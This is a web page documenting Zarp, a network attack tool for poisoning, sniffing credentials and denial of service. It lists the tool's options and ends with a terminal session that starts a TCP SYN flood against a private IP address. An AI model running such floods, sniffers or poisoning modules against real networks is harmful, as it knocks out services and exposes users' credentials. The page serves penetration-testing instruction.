ZARP

Description

Zarp is a network attack tool centered around the exploitation of local networks. This does not include system exploitation, but rather abusing networking protocols and stacks to take over, infiltrate, and knock out. Sessions can be managed to quickly poison and sniff multiple systems at once, dumping sensitive information automatically or to the attacker directly. Various sniffers are included to automatically parse usernames and passwords from various protocols, as well as view HTTP traffic and more. DoS attacks are included to knock out various systems and applications. These tools open up the possibility for very complex attack scenarios on live networks quickly, cleanly, and quietly.

Functionality:

– Poisoners
– Parameter
– Services
– Sessions
– Scanners
– DoS Attacks
– Sniffers

Usage

Syntax

 zarp [-h] [-q FILTER] [--update] [--wap] [--ftp] [--http] [--smb]
               [--ssh] [--telnet] [-w] [-s] [--service-scan]

Options

 
optional arguments:
  -h, --help      show this help message and exit
  -q FILTER       Generic network sniff
  --update        Update Zarp

Services:
  --wap           Wireless access point
  --ftp           FTP server
  --http          HTTP Server
  --smb           SMB Service
  --ssh           SSH Server
  --telnet        Telnet server

Scanners:
  -w              Wireless AP Scan
  -s              Network scanner
  --service-scan  Service scanner


Example

Flooding using ZARP

cyborg@cyborg:~$ zarp 
[!] Loaded 35 modules.
	 ____   __   ____  ____
	(__  ) / _\ (  _ \(  _ '
	 / _/ /    \ )   / ) __/
	(____)\_/\_/(__\_)(__)  [Version: 0.1.6]

	[1] Poisoners    	[5] Parameter
	[2] DoS Attacks  	[6] Services 
	[3] Sniffers     	[7] Attacks  
	[4] Scanners     	[8] Sessions 

0) Back
> 2
	[1] DHCP Starvation
	[2] LAND DoS
	[3] IPv6 Neighbor Discovery Protocol RA DoS
	[4] Nestea DoS
	[5] SMB2 DoS
	[6] TCP SYN
	[7] IPv6 Neighbor Unreachability Detection DoS
	[8] Linux 2.6.36 - 3.2.1 IGMP DoS

0) Back
> 6
	+-----+-----------------------------------------+-------+------+----------+-
	|     | Option                                  | Value | Type | Required | 
	+-----+-----------------------------------------+-------+------+----------+-
	| [1] | Number of packets to send (-1 infinite) | -1    | int  | False    | 
	+-----+-----------------------------------------+-------+------+----------+-
	| [2] | Target to DoS                           | None  | ip   | True     | 
	+-----+-----------------------------------------+-------+------+----------+-
	| [3] | Attack port                             | 80    | int  | False    | 
	+-----+-----------------------------------------+-------+------+----------+-
0) Back
TCP SYN > help

  zarp options:
	help			- This menu
	gops			- Display global options
	exit			- Exit immediately
	bg			- Put zarp to background
	set [key] [value] 	- Set key to value

  zarp module options:
	[int] [value]		- Set option [int] to value [value]
	[int] o			- View options for setting
	run (r)			- Run the selected module
	info 			- Display module information
	ops 			- Display module options

0) Back
TCP SYN > 1 -1 2 192.168.1.40
[-] Wrong type assigned.  Expected value of type "int"
TCP SYN > 1 -1    
TCP SYN > 2 192.168.1.40
TCP SYN > 3 80
TCP SYN > run
[!] Flooding '192.168.1.40'...
0 Comments

Leave a reply

CONTACT US

We're are building as a community and a team. Be a part of it.

Sending

©2017 Ztrela Knowledge Solutions Pvt. Ltd

Log in with your credentials

Forgot your details?